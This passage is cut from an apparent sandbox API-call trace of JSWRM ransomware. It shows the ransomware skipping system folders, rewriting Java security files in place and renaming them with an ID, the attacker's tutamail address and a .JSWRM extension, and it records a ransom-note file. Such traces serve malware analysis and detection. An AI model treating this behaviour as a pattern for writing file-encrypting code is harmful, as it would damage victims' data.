files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0071.450] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eac, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="java.security", cAlternateFileName="JAVA~1.SEC")) returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2=".") returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="..") returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="...") returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="windows") returned -1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="recovery") returned -1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="perflogs") returned -1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="documents and settings") returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="$RECYCLE.BIN") returned 1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="system volume information") returned -1 [0071.450] lstrcmpiW (lpString1="java.security", lpString2="msocache") returned -1 [0071.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.security", lpUsedDefaultChar=0x0) returned 13 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.security", lpUsedDefaultChar=0x0) returned 13 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0071.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0071.450] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.451] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36524) returned 1 [0071.451] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8ea0) returned 0x24e1e0 [0071.452] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x8ea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x8ea0, lpOverlapped=0x0) returned 1 [0071.456] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.456] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x8ea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x8ea0, lpOverlapped=0x0) returned 1 [0071.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0071.457] CloseHandle (hObject=0x458) returned 1 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0071.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0071.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0071.458] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x62, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="javaws.policy", cAlternateFileName="JAVAWS~1.POL")) returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2=".") returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="..") returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="...") returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="windows") returned -1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="recovery") returned -1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="perflogs") returned -1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="documents and settings") returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="$RECYCLE.BIN") returned 1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="system volume information") returned -1 [0071.458] lstrcmpiW (lpString1="javaws.policy", lpString2="msocache") returned -1 [0071.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.policy", lpUsedDefaultChar=0x0) returned 13 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0071.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.policy", lpUsedDefaultChar=0x0) returned 13 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0071.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0071.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0071.459] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.459] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=98) returned 1 [0071.459] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0071.459] ReadFile (in: hFile=0x458, lpBuffer=0x232c80, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x232c80*, lpNumberOfBytesRead=0x345e89c*=0x60, lpOverlapped=0x0) returned 1 [0071.460] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.460] WriteFile (in: hFile=0x458, lpBuffer=0x232c80*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x232c80*, lpNumberOfBytesWritten=0x345e898*=0x60, lpOverlapped=0x0) returned 1 [0071.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0071.460] CloseHandle (hObject=0x458) returned 1 [0071.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0071.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0071.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0071.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.461] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0071.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212e4da1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x212e4da1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x212e4da1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0071.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0071.462] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0071.462] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0071.462] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0071.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xdc7, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="local_policy.jar", cAlternateFileName="LOCAL_~1.JAR")) returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2=".") returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="..") returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="...") returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="windows") returned -1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="recovery") returned -1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="perflogs") returned -1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="documents and settings") returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="$RECYCLE.BIN") returned 1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="system volume information") returned -1 [0071.462] lstrcmpiW (lpString1="local_policy.jar", lpString2="msocache") returned -1 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0071.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="local_policy.jar", lpUsedDefaultChar=0x0) returned 16 [0071.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0071.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x241308, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="local_policy.jar", lpUsedDefaultChar=0x0) returned 16 [0071.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0071.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.463] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.463] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3527) returned 1 [0071.463] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x24e1e0 [0071.464] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0071.466] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.466] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0071.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0071.466] CloseHandle (hObject=0x458) returned 1 [0071.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0071.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: 